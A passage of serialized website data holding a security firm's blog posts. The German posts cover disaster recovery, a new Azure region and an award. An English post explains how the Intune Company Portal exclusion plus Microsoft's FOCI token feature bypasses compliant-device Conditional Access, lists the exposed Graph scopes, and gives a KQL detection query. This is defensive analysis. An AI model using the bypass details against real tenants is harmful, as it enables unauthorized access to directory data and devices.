automatisierte Reaktionen auf Angriffe",[810,19763,19765],{"id":19764},"kein-bcdr-ohne-testbarkeit","Kein BCDR ohne Testbarkeit",[806,19767,816],{},[806,19769,19770],{},"Ein Disaster-Recovery-Plan ist nur so gut wie der letzte erfolgreiche Test. 
In der Praxis zeigt sich oft: Pläne existieren – sind aber weder aktuell noch realitätsnah erprobt.",[806,19772,19773],{},[1736,19774,19775],{},"Empfehlung:",[2738,19777,19778,19781,19784],{},[2741,19779,19780],{},"BCDR-Pläne als Teil der IT-Governance etablieren – mit dokumentierten RTO-/RPO-Zielen je Workload",[2741,19782,19783],{},"Zuständigkeiten klar definieren (auch außerhalb der IT)",[2741,19785,19786],{},"Wiederherstellungsszenarien regelmäßig testen – auch mit Fachbereichen, inklusive eines Ransomware-Szenarios mit Wiederherstellung aus isolierten Backups und Abgleich der gemessenen Zeiten mit den definierten RTO-/RPO-Zielen",[810,19788,19790],{"id":19789},"fazit-ein-belastbarer-plan-ist-kein-nice-to-have-sondern-pflicht","Fazit: Ein belastbarer Plan ist kein Nice-to-have – sondern Pflicht",[806,19792,816],{},[806,19794,19795],{},"BCDR ist kein Produkt, sondern ein Prozess. Es geht nicht um die eine perfekte Lösung, sondern um eine risikobasierte Strategie, abgestimmt auf deine Applikationslandschaft, regulatorische Anforderungen und unternehmerischen Zielsetzungen.",[806,19797,19798],{},"Azure liefert die technologischen Grundlagen – aber die Entscheidung, sie richtig einzusetzen, beginnt auf C-Level.",[806,19800,19801],{},[1736,19802,19803],{},"Denn die Frage ist nicht, ob ein Ausfall kommt. Sondern ob du vorbereitet bist, wenn er eintritt.",{"title":863,"searchDepth":864,"depth":864,"links":19805},[19806,19807,19808,19811,19812],{"id":19647,"depth":864,"text":19648},{"id":19659,"depth":864,"text":19660},{"id":19684,"depth":864,"text":19685,"children":19809},[19810],{"id":19693,"depth":1814,"text":19694},{"id":19764,"depth":864,"text":19765},{"id":19789,"depth":864,"text":19790},{"seoTitle":19814,"titleClass":873,"date":19815,"categories":19816,"blogtitlepic":19817,"socialimg":19818,"customExcerpt":19819,"keywords":19820,"footer":19821,"contactInContent":19822,"scripts":19850},"Business Continuity & Disaster Recovery mit Azure: So machst du dein Unternehmen krisenfest","2025-04-07",[199],"head-bcdr-management.png","/blog/heads/head-bcdr-management.png","Moderne IT ist vernetzt, verteilt, komplex – und oft anfälliger, als man denkt. 
Business Continuity und Disaster Recovery sind kein IT-Luxus mehr, sondern Grundvoraussetzung für Resilienz. Die Frage ist nicht, ob etwas passiert. Sondern wie gut du vorbereitet bist, wenn es passiert.","Business Continuity, Disaster Recovery, BCDR, Microsoft Azure, Azure Backup, Azure Site Recovery, Hochverfügbarkeit Cloud, Ausfallsicherheit IT, Infrastruktur als Code, NIS2, DORA, Compliance, IT-Krisenmanagement, Cloud-Strategie, Azure BCDR, Notfallplanung IT, IT-Sicherheit, Cloud Resilienz, Ausfall Absicherung, Recovery Plan",{"noMargin":508},{"quote":508,"infos":19823},{"bgColor":883,"headline":19824,"subline":19825,"level":810,"textStyling":887,"flush":888,"person":19826,"form":19833},"Jetzt Kontakt aufnehmen!","Möchtest du mehr darüber erfahren, wie wir dein Unternehmen reibungslos und sicher in die neue Microsoft Cloud Region Österreich bringen? Wir stellen dir unser Angebot gerne persönlich vor, klären deine Fragen zu Datenschutz und Migration und begleiten dich Schritt für Schritt bei deinem Weg in die Cloud. Sichere dir jetzt dein persönliches Beratungsgespräch!",{"image":19827,"cloudinary":508,"alt":1226,"name":1226,"quotee":1226,"quoteeTitle":19828,"quote":19829,"detailsHeader":895,"details":19830},"/people/people-florian-stoeckl.jpg","Azure Lead","Die neue Microsoft Cloud Region Österreich ist ein echter Gamechanger: Lokale Datenspeicherung kombiniert mit globaler Cloud-Power – eine unschlagbare Mischung für Sicherheit, Performance und Innovation. 
Mit unserer langjährigen Expertise sorgen wir dafür, dass österreichische Unternehmen diese Chance jetzt optimal nutzen können.",[19831,19832],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19834,"method":870,"action":908,"fields":19835},{"skin":907},[19836,19837,19838,19839,19840,19842,19843,19844,19846,19848,19849],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":19841,"type":928,"id":929,"required":508,"requiredMsg":930},"Deine Nachricht an uns*",{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":199},{"type":911,"id":939,"value":19845},"AT",{"type":911,"id":942,"value":19847},"Form: Blog Hello Clöud | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508},"/posts/2025-04-07-bcdr-management",{"title":19632,"description":19638},"posts/2025-04-07-bcdr-management",[199,19855,19856],"BCDR","IT Infrastructure","HY4C9I9dQEyQyHF7lx31ooEwxEEpLZtDDH5gxVl7tiM",{"id":19859,"title":19860,"author":19861,"body":19862,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19938,"moment":19940,"navigation":508,"path":19972,"seo":19973,"stem":19974,"tags":19975,"webcast":749,"__hash__":19977},"content_de/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[1226],{"type":803,"value":19863,"toc":19934},[19864,19868,19870,19873,19899,19902,19906,19908,19911,19931],[810,19865,19867],{"id":19866},"eine-cloud-region-die-alles-verändert","Eine Cloud-Region, die alles verändert!",[806,19869,816],{},[806,19871,19872],{},"Jetzt gibt es eine Antwort auf all diese Challenges: Microsoft errichtet eine eigene Cloud-Region in Österreich mit hochmodernen Rechenzentren und maximaler Performance. 
Das bedeutet für dich: Du bekommst jetzt die globale Power einer Public Cloud mit der Sicherheit lokaler Datenspeicherung!",[2738,19874,19875,19881,19887,19893],{},[2741,19876,19877,19880],{},[1736,19878,19879],{},"Maximale Performance:"," geringere Latenzzeiten, höhere Skalierbarkeit, mehr Effizienz",[2741,19882,19883,19886],{},[1736,19884,19885],{},"Lokale Datenspeicherung:"," Kundendaten regionaler Azure-Dienste bleiben im Ruhezustand in Österreich – diese Datenresidenz ergänzt die eigene Datenschutz- und Compliance-Bewertung (etwa für globale Dienste wie Microsoft Entra ID), ersetzt sie aber nicht",[2741,19888,19889,19892],{},[1736,19890,19891],{},"Erhöhte Sicherheit & Resilienz:"," modernste Infrastruktur mit mehrfacher Absicherung",[2741,19894,19895,19898],{},[1736,19896,19897],{},"Nachhaltige IT:"," bis zu 93 % energieeffizienter als traditionelle Rechenzentren",[806,19900,19901],{},"Doch eine Cloud-Region allein reicht nicht – erst der richtige Partner macht den Unterschied. Hier kommen wir von glueckkanja ins Spiel.",[810,19903,19905],{"id":19904},"wir-machen-dich-bereit-für-die-lokale-zukunft-deiner-it","Wir machen dich bereit für die lokale Zukunft deiner IT!",[806,19907,816],{},[806,19909,19910],{},"In Deutschland gehören wir zu den führenden Microsoft-Partnern für Cloud-Migration. Jetzt gibt es unser Know-how auch in der neuen Microsoft Cloud Region Österreich. Als strategischer Partner bringen wir dein Unternehmen jetzt reibungslos in die Cloud. Du hast Fragen zum Datenschutz, zur Migration von Systemen oder zu nutzbaren finanziellen Vorteilen? Wir sind für dich da und begleiten dich von den ersten Steps bis zum finalen Go-live (und gerne auch darüber hinaus). 
Deine Vorteile:",[2738,19912,19913,19919,19925],{},[2741,19914,19915,19918],{},[1736,19916,19917],{},"Blueprint & Landing Zone Deployment:"," Wir ermöglichen dir eine sichere, schnelle und reibungslose Migration!",[2741,19920,19921,19924],{},[1736,19922,19923],{},"AMM Funding:"," Wir informieren dich umfassend über Microsoft-Förderungen für eine kosteneffiziente Umstellung!",[2741,19926,19927,19930],{},[1736,19928,19929],{},"Nahtloser Umzug:"," Wir begleiten dich mit standardisierten Lösungen Schritt für Schritt in die neue Ö-Cloud!",[806,19932,19933],{},"Profitiere jetzt von unserer Erfahrung aus über 100 erfolgreichen Cloud-Migrationen und unserer erstklassigen Microsoft-Expertise.",{"title":863,"searchDepth":864,"depth":864,"links":19935},[19936,19937],{"id":19866,"depth":864,"text":19867},{"id":19904,"depth":864,"text":19905},{"seoTitle":19939,"titleClass":873,"date":19940,"categories":19941,"blogtitlepic":19942,"socialimg":19943,"customExcerpt":19944,"keywords":19945,"contactInContent":19946,"hreflang":19966,"scripts":19971,"published":508},"Microsoft Cloud Region Österreich: Lokale Cloud-Power für dein Unternehmen","2025-03-12",[199],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Aktuell stehen Österreichs Unternehmen an einem Wendepunkt. Die Digitalisierung nimmt immer rasanter Fahrt auf. 
Gleichzeitig steigen mit ihr die Anforderungen an IT-Sicherheit, Geschwindigkeit und Flexibilität – und auch die Herausforderungen in Bezug auf Kosten, regulatorische Hürden und den Einsatz neuer Technologien wachsen.","Microsoft Cloud Region Österreich, Cloud Migration Österreich, lokale Datenspeicherung, Cloud Sicherheit, Microsoft Partner Österreich, Cloud-Performance, nachhaltige IT, Cloud Lösungen Österreich, Azure Migration, Landing Zone Deployment",{"quote":508,"infos":19947},{"bgColor":883,"headline":19824,"subline":19825,"level":810,"textStyling":887,"flush":888,"person":19948,"form":19952},{"image":19827,"cloudinary":508,"alt":1226,"name":1226,"quotee":1226,"quoteeTitle":19828,"quote":19829,"detailsHeader":895,"details":19949},[19950,19951],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19953,"method":870,"action":908,"fields":19954},{"skin":907},[19955,19956,19957,19958,19959,19960,19961,19962,19963,19964,19965],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":19841,"type":928,"id":929,"required":508,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":199},{"type":911,"id":939,"value":19845},{"type":911,"id":942,"value":19847},{"type":911,"id":945,"value":946},{"type":911,"id":948},[19967,19969],{"lang":953,"href":19968},"/blog/azure/2025/03/azure-goes-austria-en",{"lang":956,"href":19970},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":508},"/posts/2025-03-12-azure-goes-austria",{"title":19860,"description":863},"posts/2025-03-12-azure-goes-austria",[199,19976,19856,19286],"Cloud 
Migration","-eFhiSh4gYFDE-GRbtqAtk_Y-UGFMO_52qBwxlU0rV8",{"id":19979,"title":19980,"author":19981,"body":19982,"cta":764,"description":20048,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":20049,"moment":20051,"navigation":508,"path":20063,"seo":20064,"stem":20065,"tags":20066,"webcast":749,"__hash__":20067},"content_de/posts/2025-03-04-mssp-2025.md","'23, '24, '25 – das Triple ist komplett!",[801],{"type":803,"value":19983,"toc":20043},[19984,19990,19994,19996,20003,20005,20009,20011,20014,20017,20028,20031,20035,20037,20040],[806,19985,19986,19989],{},[1736,19987,19988],{},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards."," Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",[810,19991,19993],{"id":19992},"eine-der-begehrtesten-auszeichnungen-der-branche","Eine der begehrtesten Auszeichnungen der Branche",[806,19995,816],{},[806,19997,19998,19999,20002],{},"Die Microsoft Security Excellence Awards gehören zu den renommiertesten Auszeichnungen der IT-Sicherheitsbranche. Jährlich ehrt Microsoft Partner, die neue Maßstäbe in der Abwehr von Cyber-Bedrohungen setzen. 
Auch 2025 gehört glueckkanja zu den ",[1736,20000,20001],{},"Spitzenreitern in der Kategorie \"Security MSSP of the Year\""," – einer Auszeichnung, die ausschließlich an die besten Managed Security Service Provider vergeben wird.",[1432,20004],{":quotes":1432,":no-fullscreen":1435},[810,20006,20008],{"id":20007},"drei-jahre-in-folge-ausgezeichnet-und-das-ist-erst-der-anfang","Drei Jahre in Folge ausgezeichnet – und das ist erst der Anfang",[806,20010,816],{},[806,20012,20013],{},"Unsere erneute Auszeichnung als führender MSSP ist das Ergebnis unseres konsequenten Fokus auf innovative Sicherheitslösungen und exzellenten Service. glueckkanja kombiniert modernste Microsoft-Security-Technologien mit tiefgehender Expertise und einem klaren Ziel: Unternehmen in einer zunehmend bedrohlichen Cyberwelt optimal abzusichern. Und das direkte Kundenfeedback spricht für sich:",[806,20015,20016],{},"Unsere CSOC Customer Poll zeigt die herausragende Qualität unserer Services:",[2738,20018,20019,20022,20025],{},[2741,20020,20021],{},"87 % bewerten unsere technische Expertise auf höchstem Niveau",[2741,20023,20024],{},"94 % loben unsere 24/7-Abdeckung",[2741,20026,20027],{},"100 % sind mit der Gesamterfahrung zufrieden",[806,20029,20030],{},"Ein großes Dankeschön an Microsoft und MISA für ihr Vertrauen, die wertvolle Partnerschaft und die kontinuierliche Unterstützung. Diese Community aus führenden Security-Experten ist mehr als ein Netzwerk – sie ist ein Ökosystem, das gemeinsam Maßstäbe setzt. Ein besonderer Dank gilt auch allen MISA-Partnern: Eure Innovationen und euer Engagement treiben uns alle voran. Gemeinsam machen wir die digitale Welt sicherer.",[810,20032,20034],{"id":20033},"_23-24-25-wir-setzen-den-standard-in-microsoft-security","'23, '24, '25 – Wir setzen den Standard in Microsoft Security",[806,20036,816],{},[806,20038,20039],{},"Drei Jahre in Folge ausgezeichnet – das ist mehr als ein Erfolg, es ist ein klares Zeichen für Exzellenz. 
glueckkanja bleibt an der Spitze der Microsoft Sicherheitslandschaft und wird auch in Zukunft mit innovativen Lösungen und herausragender Servicequalität Maßstäbe setzen.",[806,20041,20042],{},"Wir freuen uns auf die weitere Zusammenarbeit mit Microsoft, unseren Kunden und Partnern – und auf das nächste Kapitel in unserer Erfolgsgeschichte.",{"title":863,"searchDepth":864,"depth":864,"links":20044},[20045,20046,20047],{"id":19992,"depth":864,"text":19993},{"id":20007,"depth":864,"text":20008},{"id":20033,"depth":864,"text":20034},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards. Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",{"seoTitle":20050,"titleClass":873,"date":20051,"categories":20052,"blogtitlepic":19613,"socialimg":19614,"customExcerpt":20053,"keywords":19616,"hreflang":20054,"quotes":20057},"Microsoft Security Excellence Awards: glueckkanja erneut Finalist als Security MSSP des Jahres 2025","2025-03-04",[876],"glueckkanja ist erneut Finalist bei den Security MSSP of the Year Awards und damit wieder unter den weltweit führenden Managed Microsoft Security Anbietern, die im April auf der RSA Conference in San Francisco gefeiert werden. Drei Jahre in Folge gehört unser Unternehmen zu den besten Partnern im Bereich Cybersecurity – eine Erfolgsgeschichte, die ihresgleichen sucht.",[20055,20056],{"lang":953,"href":19619},{"lang":956,"href":19621},{"items":20058},[20059],{"text":20060,"name":20061,"company":20062,"alt":20061},"I'm very pleased to extend my warmest congratulations to this year's finalists for the Microsoft Security Excellence Awards. 
These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It's my pleasure to acknowledge and celebrate their work over the past year.","Maria Thomson","Director, Microsoft Intelligent Security Association","/posts/2025-03-04-mssp-2025",{"title":19980,"description":20048},"posts/2025-03-04-mssp-2025",[963,19627,371,19628],"w3sTYMrEH9K8SwKVZM13--gOSmVW42V4sP-MaJ1eU-8",{"id":20069,"title":20070,"author":20071,"body":20072,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":20700,"moment":20702,"navigation":508,"path":20728,"seo":20729,"stem":20730,"tags":20731,"webcast":749,"__hash__":20735},"content_de/posts/2025-01-14-compliant-device-bypass.md","Compliant Device Bypass - All you need to know!",[1185,1065,1221],{"type":803,"value":20073,"toc":20683},[20074,20078,20080,20130,20134,20136,20148,20155,20166,20172,20175,20179,20181,20185,20187,20190,20193,20253,20256,20259,20263,20265,20269,20271,20285,20292,20295,20298,20300,20303,20306,20309,20317,20328,20331,20333,20336,20340,20342,20345,20350,20354,20356,20359,20362,20365,20518,20522,20524,20527,20566,20570,20572,20579,20582,20585,20599,20602,20605,20658,20665,20669,20671,20674,20677,20680],[810,20075,20077],{"id":20076},"what-happened-so-far","What happened so far?",[806,20079,816],{},[2738,20081,20082,20103,20118,20127],{},[2741,20083,20084,20085,20090,20091,20096,20097,20102],{},"In December 2024 ",[833,20086,20089],{"href":20087,"rel":20088},"https://x.com/TEMP43487580",[1410],"Yuya Chudo"," gave his talk 
“",[833,20092,20095],{"href":20093,"rel":20094},"https://www.blackhat.com/eu-24/briefings/schedule/#unveiling-the-power-of-intune-leveraging-intune-for-breaking-into-your-cloud-and-on-premise-42176",[1410],"Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise","” at the Black Hat Europe conference. In this session he showed how to abuse a hardcoded rarely known exclusion in Conditional Access (CA) for device compliance in combination with the undocumented “",[833,20098,20101],{"href":20099,"rel":20100},"https://github.com/secureworks/family-of-client-ids-research",[1410],"FOCI-Feature","” in Entra ID. In the talk he also presented the response from Microsoft MSRC (VULN-123240) that this behavior is by design and required for successful Intune Enrollment of new devices.",[2741,20104,20105,20106,20111,20112,20117],{},"Some days after the conference Sunny Chau published the proof-of-concept tool ",[833,20107,20110],{"href":20108,"rel":20109},"https://github.com/JumpsecLabs/TokenSmith",[1410],"TokenSmith"," including a ",[833,20113,20116],{"href":20114,"rel":20115},"https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/",[1410],"companion blog posts"," - what made the technique available for a broader audience.",[2741,20119,20120,20121,20126],{},"In addition, a ",[833,20122,20125],{"href":20123,"rel":20124},"https://github.com/zh54321/PoCEntraDeviceComplianceBypass/blob/main/poc_entra_compliance_bypass.ps1",[1410],"PoC written in PowerShell"," has been published.",[2741,20128,20129],{},"Since the end of December, we at glueckkanja AG have been investigating how to prevent and detect this technique. 
In this blog post we would like to share some of our insights regarding the attack and discuss mitigation and detection options.",[810,20131,20133],{"id":20132},"tldr","TL;DR",[806,20135,816],{},[806,20137,20138,20139,20144,20145],{},"There are some resources with a built-in exclusion to specific Grant Controls/Conditions in Conditional Access to solve certain problems. One of them is the exclusion of the Company Portal App for Device Compliance to solve the chicken-egg-problem to get devices enrolled in Intune before they are considered compliant. This behavior is ",[833,20140,20143],{"href":20141,"rel":20142},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-alt-all-users-compliant-hybrid-or-mfa#:~:text=You%20can%20enroll,Company%20Portal%20application",[1410],"documented here",".\n",[1736,20146,20147],{},"This means you can get access and refresh token for this app from an unmanaged device even if a CA policy is enforcing Device Compliance for “All resources”.",[806,20149,20150,20154],{},[1449,20151],{"alt":20152,"src":20153},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-02.png","{: .post__screenshot}",[806,20156,20157,20158,20162,20163],{},"Microsoft has implemented a feature called Family of Client IDs (FOCI) which allows a group of Microsoft OAuth client applications to obtain access tokens as any other client in the family using their refresh token. A behavior otherwise not allowed in the OAuth2 standard. Read the ",[833,20159,20161],{"href":20099,"rel":20160},[1410],"original work of Secureworks"," for more details.\n",[1736,20164,20165],{},"Since the Company Portal App is a “family member” the requested Refresh Tokens for it can be used to get tokens for other apps in the family.",[806,20167,20168,20169],{},"The FOCI feature is limited and the consent between the client id and the resource must be explicitly configured and granted. 
In the case of the Company Portal App this consent has been granted, among others, for access to Microsoft Graph using a restricted scope and to the Azure AD Graph API with the permission of the current user.\n",[1736,20170,20171],{},"This means a Company Portal refresh token can be used to obtain e.g. Azure AD Graph API access tokens with the scope user_impersonation, allowing us to do a lot of things with e.g. AADInternals or ROADrecon",[806,20173,20174],{},"To execute the attack, the attacker requires either valid credentials of the victim (plus the ability to perform MFA if this is required by Conditional Access) or a valid refresh token.",[810,20176,20178],{"id":20177},"what-risk-and-blast-radius-exists","What risk and blast radius exists?",[806,20180,816],{},[1671,20182,20184],{"id":20183},"which-of-the-possible-resources-scopes-are-affected-from-the-compliance-exclusion","Which of the possible resources (scopes) are affected by the compliance exclusion?",[806,20186,1536],{},[806,20188,20189],{},"The Attacker has the option to request tokens for another FOCI application as already described before. However, Microsoft has implemented a bypass for the device compliance requirements only for access tokens to certain resource applications with various API permission scopes. 
In particular, the following delegated API permissions are sensitive and of interest to attackers:",[3604,20191,20192],{},"\ntable {\n  font-family: arial, sans-serif;\n  border-collapse: collapse;\n  width: 100%;\n}\n\ntd, th {\n  border: 1px solid #dddddd;\n  text-align: left;\n  padding: 8px;\n}\n\ntr:nth-child(even) {\n  background-color: #dddddd;\n}\n",[1902,20194,20195,20208],{},[1907,20196,20197],{},[1911,20198,20199,20202,20205],{},[1915,20200,20201],{},"Resource Application",[1915,20203,20204],{},"Application Id",[1915,20206,20207],{},"Delegated Permission Scope",[1923,20209,20210,20221,20232,20243],{},[1911,20211,20212,20215,20218],{},[1928,20213,20214],{},"AADGraph",[1928,20216,20217],{},"00000002-0000-0000-c000-000000000000",[1928,20219,20220],{},"user_impersonation",[1911,20222,20223,20226,20229],{},[1928,20224,20225],{},"Microsoft Graph API",[1928,20227,20228],{},"00000003-0000-0000-c000-000000000000",[1928,20230,20231],{},"“email\", \"openid\", \"profile\",\"Device.Read.All\", \"DeviceManagementConfiguration.Read.All\", \"DeviceManagementConfiguration.ReadWrite.All\", \"ServicePrincipalEndpoint.Read.All\", \"User.Read”",[1911,20233,20234,20237,20240],{},[1928,20235,20236],{},"Device Registration Service",[1928,20238,20239],{},"01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9",[1928,20241,20242],{},"adrs_access",[1911,20244,20245,20248,20251],{},[1928,20246,20247],{},"Windows Azure Service Management API",[1928,20249,20250],{},"797f4846-ba00-4fd7-ba43-dac1f8f63013",[1928,20252,20220],{},[806,20254,20255],{},"Since the granted permissions are not for the application itself, the impact depends on the privileges of the caller (user account) and which delegated permission scopes are authorized to execute API calls on the scope.",[806,20257,20258],{},"Let us have a closer look at the criticality of the shown delegated permission scope and potential authorization to call sensitive 
APIs?",[810,20260,20262],{"id":20261},"which-privileges-and-delegated-scope-are-critical","Which privileges and delegated scope are critical?",[806,20264,816],{},[1671,20266,20268],{"id":20267},"azure-ad-graph-api","Azure AD Graph API",[806,20270,1536],{},[806,20272,20273,20274,20279,20280,8072],{},"The legacy programmatic interface offers many APIs to manage directory settings and objects in Entra ID (Azure AD). This includes Conditional Access policies, directory roles, CRUD on groups and devices and operations on the signed-in user, such as change password. A full list of all supported operations can be found in the ",[833,20275,20278],{"href":20276,"rel":20277},"https://learn.microsoft.com/en-us/previous-versions/azure/ad/graph/api/api-catalog",[1410],"Azure AD Graph API reference",". This API will be fully retired on June 30, 2025 (based on ",[833,20281,20284],{"href":20282,"rel":20283},"https://learn.microsoft.com/en-us/graph/migrate-azure-ad-graph-overview",[1410],"Microsoft latest announcements",[806,20286,20287,20288,20291],{},"The assigned delegated scope “user_impersonation” allows the application (in this case, Company Portal) to act on behalf of the user. So, every permission that the signed-in user has to an Entra object, scope or directory-level can be used as authorization in the API calls. The user might be the owner of an Entra ID object (application, group, or other objects), or they might be assigned permissions through Entra ID role assignments. ",[1736,20289,20290],{},"In the case of active high privileged role assignments, this would allow the attacker to modify objects or compromise the tenant",". At least, even without any privileges, default user permissions can be used for extensive reconnaissance and enumeration of directory objects in the tenant.",[806,20293,20294],{},"Therefore, the scenarios and impact to abuse the Azure AD Graph API depends on the active or permanent assigned privileges of the affected user. 
APIs to access Microsoft 365 services (e.g., for exfiltration of OneDrive) are not included in Azure AD Graph.",[1671,20296,20225],{"id":20297},"microsoft-graph-api",[806,20299,1536],{},[806,20301,20302],{},"In comparison to Azure AD Graph, the delegated scope to Microsoft Graph API is restricted to a certain scope. Alongside OpenID scopes (openid, email, profile) and basic read operations on behalf of the user (ServicePrincipalEndpoint.Read.All, User.Read).",[806,20304,20305],{},"List and read of all device objects can be achieved by calling “device” endpoint in Microsoft Graph with default permissions by using “Device.Read.All\". This could help attackers to gain insights of device objects.",[806,20307,20308],{},"In case of a compromised user with assignment to “Intune Administrator” or any delegation in Microsoft Intune RBAC, the following granted delegated API permission should be considered problematic:",[2738,20310,20311,20314],{},[2741,20312,20313],{},"”DeviceManagementConfiguration.Read.All”",[2741,20315,20316],{},"“DeviceManagementConfiguration.ReadWrite.All”",[806,20318,20319],{},[1736,20320,20321,20322,20327],{},"Those delegated permissions allow CRUD operations, for example on Device Compliance and Configuration Policies but also deployment of ",[833,20323,20326],{"href":20324,"rel":20325},"https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta",[1410],"Management Scripts"," for further malicious activity on target devices.",[1671,20329,20236],{"id":20330},"device-registration-service",[806,20332,1536],{},[806,20334,20335],{},"With this permission the attacker is able to join or register a device to Entra ID. 
In turn this would allow them to even enroll the device in Intune and depending on the Intune configuration get a valid and compliant device to access even more protected services.",[1671,20337,20339],{"id":20338},"other-foci-applications","Other FOCI applications",[806,20341,1536],{},[806,20343,20344],{},"Requesting access to other privileged interfaces, for example the Azure Resource Manager API, is in scope of FOCI and of interest to the attacker as well. However, this resource is still protected: the Conditional Access grant control “compliant device” is not bypassed for it.",[806,20346,20347],{},[1449,20348],{"alt":20152,"src":20349},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-03.png",[810,20351,20353],{"id":20352},"can-we-detect-this-attack-technique","Can we detect this attack technique?",[806,20355,816],{},[806,20357,20358],{},"As described above, the greatest risk comes from access to MS Graph and Azure AD Graph.",[806,20360,20361],{},"Since the application ID of the Microsoft Intune Company Portal App is always used in this case, the main task for creating a detection is to exclude legitimate use by e.g. 
device registrations, which according to our observation consists of which resources are accessed first in a session → in case of an attack usually MS Graph or Azure AD Graph.",[806,20363,20364],{},"Here is a working detection that we tested in several environments different sizes:",[1541,20366,20368,20369,20371,20372,20376,20377,20381,20385,2025,20387,20389,2025,20393,20371,20395,20397,20398,2025,20402,20404,2025,20407,20371,20409,20411,20412,20414,2025,20417,20371,20419,20421,20422,2887,20425,2289,20428,9798,20431,20371,20433,20436,20437,20439,2025,20442,20371,20444,2887,20447,20449,20450,20452,20453,20455,20456,2025,20458,20452,20460,20463,20464,20467,20468,20470,20471,20436,20474,20476,2025,20479,20371,20481,20483,20484,20371,20486,20488,20489,2025,20491,20493,2025,20495,20371,20497,20397,20499,2025,20501,20503,2025,20506,20371,20508,20421,20510,2887,20512,2289,20514,9798,20516],{"style":20367},"background-color:#000000; font-family: 'Source Code Pro', 'Courier New', monospace; padding: 15px; color: #ffffff","\nAADSignInEventsBeta ",[2016,20370],{},"\n| ",[1588,20373,20375],{"style":20374},"color: #569CD6;","where"," Timestamp > ",[1588,20378,20380],{"style":20379},"color: #E6DB74;","ago(",[1588,20382,20384],{"style":20383},"color: #A6E22E;","7d",[1588,20386,2772],{"style":20379},[2016,20388],{},[1588,20390,20392],{"style":20391},"color: #75715E;","// Access to Microsoft Intune Company Portal",[2016,20394],{},[1588,20396,20375],{"style":20374}," ApplicationId == ",[1588,20399,20401],{"style":20400},"color: #D69D85;","@\"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\"",[2016,20403],{},[1588,20405,20406],{"style":20391},"// From non joined/registered device",[2016,20408],{},[1588,20410,20375],{"style":20374}," isempty(AadDeviceId) ",[2016,20413],{},[1588,20415,20416],{"style":20391},"// Used to access resource Microsoft Graph or Windows Azure Active Directory",[2016,20418],{},[1588,20420,20375],{"style":20374}," ResourceId 
",[1588,20423,20424],{"style":20374},"in",[1588,20426,20427],{"style":20400},"\"00000002-0000-0000-c000-000000000000\"",[1588,20429,20430],{"style":20400},"\"00000003-0000-0000-c000-000000000000\"",[2016,20432],{},[1588,20434,20435],{"style":20374},"summarize by"," SessionId ",[2016,20438],{},[1588,20440,20441],{"style":20391},"// Find the initial logon event based on the session Id",[2016,20443],{},[1588,20445,20446],{"style":20374},"join kind=inner",[2016,20448],{},"\n    AADSignInEventsBeta ",[2016,20451],{},"\n    | ",[1588,20454,20375],{"style":20374}," ErrorCode == ",[1588,20457,2292],{"style":20383},[2016,20459],{},[1588,20461,20462],{"style":20374},"summarize arg_min(","Timestamp, *",[1588,20465,20466],{"style":20374},") by"," SessionId)",[2016,20469],{},"\n    ",[1588,20472,20473],{"style":20374},"on",[2016,20475],{},[1588,20477,20478],{"style":20391},"// Ignore trusted and managed devices",[2016,20480],{},[1588,20482,20375],{"style":20374}," isempty(DeviceTrustType) ",[2016,20485],{},[1588,20487,20375],{"style":20374}," IsManaged != ",[1588,20490,2322],{"style":20383},[2016,20492],{},[1588,20494,20392],{"style":20391},[2016,20496],{},[1588,20498,20375],{"style":20374},[1588,20500,20401],{"style":20400},[2016,20502],{},[1588,20504,20505],{"style":20391},"// when the first requested resource is Microsoft Graph or Windows Azure Active Directory",[2016,20507],{},[1588,20509,20375],{"style":20374},[1588,20511,20424],{"style":20374},[1588,20513,20427],{"style":20400},[1588,20515,20430],{"style":20400},[2016,20517],{},[810,20519,20521],{"id":20520},"how-should-we-respond-when-we-detect-suspicious-activities","How should we respond when we detect suspicious 